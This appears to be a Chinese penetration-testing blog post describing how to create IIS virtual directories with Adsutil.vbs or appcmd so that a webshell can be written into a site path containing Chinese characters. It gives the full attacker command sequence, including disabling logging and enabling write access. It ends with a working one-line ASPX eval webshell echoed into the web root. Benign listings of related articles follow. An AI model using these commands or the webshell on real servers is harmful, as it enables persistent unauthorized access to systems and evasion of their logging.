利用IIS虚拟目录写马至中文路径

简介: 利用IIS虚拟目录写马至中文路径

0x01 前言

知识星球看到@紫陌师傅分享的一篇《利用IIS虚拟目录绕过os-shell中文目录》,所以想着对他文中提到的利用Adsutil.vbs脚本创建虚拟目录写马至中文路径的方式进行复现,但仅适用于低版本IIS,高版本要用appcmd。


0x02 思路分享

Adsutil.vbs是Windows系统自带的一个脚本,可用于命令行下管理IIS,默认在C:\inetpub\AdminScripts目录下,但只在IIS6默认会有这个脚本,IIS7及以上需要单独安装“IIS6脚本工具”组件才有。

我们可以通过执行Adsutil.vbs脚本获取目标网站的各种信息,如:网站ID、绑定域名、应用程序池和查看/创建/删除虚拟目录等,实战场景中还得去删除下创建的虚拟目录,否则可能一直存在。


主要用到命令:

    所有网站ID:cscript.exe c:\inetpub\adminscripts\adsutil.vbs enum /P W3SVC
    对象绑定信息:cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/2/serverbindings
    创建虚拟目录:cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/2/root/hacking/ IisWebVirtualDir
    删除虚拟目录:cscript.exe c:\inetpub\adminscripts\adsutil.vbs delete w3svc/2/root/hacking
    设置物理路径:cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/2/root/hacking/path C:\ProgramData\testing


    其他常用命令:

      IIS应用池名:cscript.exe C:\inetpub\AdminScripts\adsutil.vbs enum /P W3SVC/APPPOOLS
      IIS应用池信息:cscript.exe C:\inetpub\AdminScripts\adsutil.vbs enum W3SVC/APPPOOLS/DefaultAppPool
      对象虚拟目录:cscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/2/root
      不设置日志:cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/2/root/hacking/DontLog 1
      设置写权限:cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/2/root/hacking/accesswrite 1
      设置读权限:cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/2/root/hacking/accessread 1
      可列目录权限:cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/2/root/hacking/enabledirbrowsing 1
      启动2号Web服务:cscript.exe c:\inetpub\adminscripts\adsutil.vbs start_server w3svc/2

      遇到IIS7及以上场景时我们也可以通过执行appcmd获取IIS中的所有网站名称和对应的物理路径,快速定位到目标网站的绝对路径,也能查看/创建/删除虚拟目录等,方便我们写马至中文路径。

        查看虚拟目录:
        C:\Windows\System32\inetsrv\appcmd list vdir
        创建虚拟目录:
        C:\Windows\System32\inetsrv\appcmd add vdir /app.name:www.testing.com/ /path:/hacking1 /physicalPath:C:\ProgramData\testing1
        删除虚拟目录:
        C:\Windows\System32\inetsrv\appcmd delete vdir "www.testing.com/hacking1"

        注:使用appcmd创建虚拟目录时得注意下格式,app.name网站名称,path虚拟目录别名,physicalPath物理路径,还得注意app.name、path中的/,这两斜杠都需要保留,否则可能会出错。

        使用Adsutil.vbs脚本或appcmd建立虚拟目录后就可以无视目标网站物理路径中存在的中文字符了。


        因为这是直接往虚拟目录中写入文件,所以可以成功将Webshell写入至中文路径,如下图所示...。

          echo ^<%%@ Page Language="Jscript"%%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%%^> > C:\inetpub\wwwroot\中文测试\shell.aspx

          相关文章
          |
          存储 缓存 文件存储
          IIS应用使用虚拟目录功能,将数据目录存放到阿里云SMB文件系统上实现弹性存储
          阿里云SMB文件系统具有超大容量以及弹性扩展的能力,但是兼容性和性能相比虚拟机系统盘有差距。针对这个特性,可以将IIS应用的数据部分存放在云上文件系统中,应用核心还是在系统盘上运行,通过IIS虚拟目录功能将IIS应用与阿里云SMB文件系统的目录相连。 本文详述了如何配置IIS虚拟目录到阿里云SMB文件系统,实现存储海量扩展。
          931 0
          IIS应用使用虚拟目录功能,将数据目录存放到阿里云SMB文件系统上实现弹性存储
          |
          数据安全/隐私保护 Windows .NET
          |
          Web App开发
          IIS添加虚拟目录后无法启动问题
          安装CruiseControl.net的web dashboard时指定了virtual direccory,但访问url的 时候报错显示can't access IIS metabase, 这是由于新安装IIS需要asp.
          606 0
          |
          开发框架 安全 .NET
          iis 启用父目录路径访问
          今天公司有个客户保修网站后台无法访问,我查看了源代码,发现ASP代码本身并没有什么问题。而且我下到本地能够访问。就是在网上不能正常连接,显示入下错误:Server.MapPath() 错误 'ASP 0175 : 80004005' 不允许的 Path 字符 /0709/dqyllhsub/news/OpenDatabase.asp,行 4 在 MapPath 的 Path 参数中不允许字符 '..'网页里面用了一个 Response.Redirect 的路径重指向,客户页面里面指向路径写的是相对路径,省略了网站域名地址。
          1265 0